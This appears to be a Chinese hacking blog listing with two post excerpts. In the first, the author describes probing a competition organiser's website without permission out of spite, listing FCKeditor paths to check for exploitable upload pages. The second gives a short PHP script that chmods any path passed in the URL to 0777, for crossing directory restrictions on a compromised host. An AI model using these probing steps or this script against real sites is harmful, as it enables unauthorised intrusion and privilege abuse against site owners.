天黑再动手

摘要： 好久没有脚本入侵了,今天因为参加了一个比赛,然后证书居然需要钱来买的,就很不爽,百度了下其官方网,进行了一次安检,结果是没有成功,因为iis的文件解析漏洞补上了,不过学到了一些Fckeditor在没有上传页面的情况下的入侵方式。首先,你得确定下Fckeditor的版本。 /FCKeditor/editor/dialog/fck_about.html其次,你确定下以下几个上传页面是否真的被删除了呢? /FCKeditor/editor/filemanager/browser/default/browser.html /FCKeditor/editor/filemanager/browser/d. 阅读全文

摘要： linux权限多设的比较松的其实，但有的虚拟机还是不能跨目录访问的。在提不了权的情况下，试试如下代码吧。运气好的话说不定就跨过去了。代码如下：<?php$path = stripslashes($_GET['path']);$ok = chmod ($path , 0777);if ($ok == true)echo CHMOD OK , Permission editable file or directory. Permission to write;?>把上面代码保存为tmdsb.PHP然后访问http://www.tmdsb.com/tmdsb.php?pa 阅读全文